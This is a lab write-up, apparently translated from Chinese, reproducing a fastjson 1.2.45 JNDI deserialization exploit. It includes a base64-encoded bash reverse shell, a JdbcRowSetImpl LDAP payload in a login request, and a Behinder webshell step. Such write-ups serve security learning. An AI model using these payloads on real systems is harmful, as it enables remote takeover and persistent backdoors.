banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

fastjson vulnerability reproduction - 1245 - jdk8u342

#漏洞复现50
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document outlines a process for exploiting a vulnerability related to FastJSON version 1.2.45. It begins with capturing the login request and identifying the version through error messages. To bypass high JDK versions, the author uses a tool called JNDIBypass.jar to start an LDAP service. The process involves sending crafted requests that leverage Java's serialization to execute commands remotely. The author demonstrates how to set up a listener using `nc` (netcat) and sends a POST request to the login endpoint with specific payloads to gain shell access. The final steps include injecting a web shell for further exploitation.

Exploit#

Reference: https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md

Focus on reproducing a process to understand the vulnerability exploitation flow. There are many great articles by experts online, but they are not sufficient for foundational learning (especially regarding compiling Java files with IDEA, how to resolve dependency issues, etc. -__-|). Therefore, I will document my reproduction process.

Capture the request at the login point, the request packet is as follows:

Pasted image 20241230150320

Error reporting method to understand the version

{
  "@type": "java.lang.AutoCloseable"

Pasted image 20241230150723

The fastjson version is 1.2.45

According to the author's description, it is necessary to bypass high versions of JDK, so the author's JNDIBypass.jar tool is used.

Use the JNDIBypass.jar file to start the LDAP service

java -jar .\JNDIBypass.jar -a 192.168.80.53 -p 1389 -c "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44MC41My8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

nc listening

Pasted image 20250102104658

Send packet

POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 262
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.80.53:1389/jpiuw",
        "autoCommit":true
    }
}

Pasted image 20250102104820

Return shell

Pasted image 20250102104906

java -jar .\JNDIBypass.jar -h

Pasted image 20250102105053

Injecting Ice Scorpion backdoor

Pasted image 20250102105226

Connect

Pasted image 20250102105416

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.